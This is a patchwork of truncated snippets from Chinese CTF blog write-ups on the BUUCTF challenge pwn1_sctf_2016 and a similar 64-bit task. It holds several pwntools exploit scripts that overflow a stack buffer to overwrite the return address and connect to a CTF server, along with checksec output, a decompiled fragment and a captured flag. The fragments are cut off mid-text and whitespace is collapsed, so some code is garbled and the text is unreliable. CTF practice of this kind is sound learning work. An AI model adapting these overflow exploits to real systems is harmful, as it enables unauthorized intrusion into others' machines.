frompwnimport* #p=process('./pwn1') p=remote('node4.buuoj.cn',26474) payload=b'I'*20+b'a'*4+p32(0x8048f0d) p.sendline(payload) p.interactive()
frompwnimport*p = remote('node3.buuoj.cn',25333)payload =b'x'*72+ p64(0x40060d)p.sendline(payload)p.interactive() 运行exp脚本得到: 4|2得到flag flag{10d21dd6-9b91-45de-bf83-e01e0083d45e} 5|0⭐pwn1_sctf_2016 【题目链接】 下载得到pwn1_sctf_2016文件 checksec pwn1_sctf_2016 3...
from pwn import * p = process('./pwn1_sctf_2016') payload = 'I'*20 +'A'*4+ p64(0x8048F0D) p.send(payload) p.interactive() __EOF__ 本文作者:续梦人 本文链接:https://www.cnblogs.com/cwcr/p/16119854.html关于博主:评论和私信会在第一时间回复。或者直接私信我。版权声明:本博客...
pwn1_sctf_2016 检查文件的保护措施 Arch:i386-32-littleRELRO:PartialRELROStack:NocanaryfoundNX:NXenabledPIE:NoPIE(0x8048000) 32位程序,开了nx保护,ida分析 intvuln(){constchar*v0;// eaxchars;// [esp+1Ch] [ebp-3Ch]charv3;// [esp+3Ch] [ebp-1Ch]charv4;// [esp+40h] [ebp-18h]charv5...
root@kali:~/Downloads# checksec pwn1_sctf_2016[*]'/root/Downloads/pwn1_sctf_2016'Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled#//栈不可执行PIE: No PIE IDA int__cdeclmain(intargc,constchar**argv,constchar**envp){ ...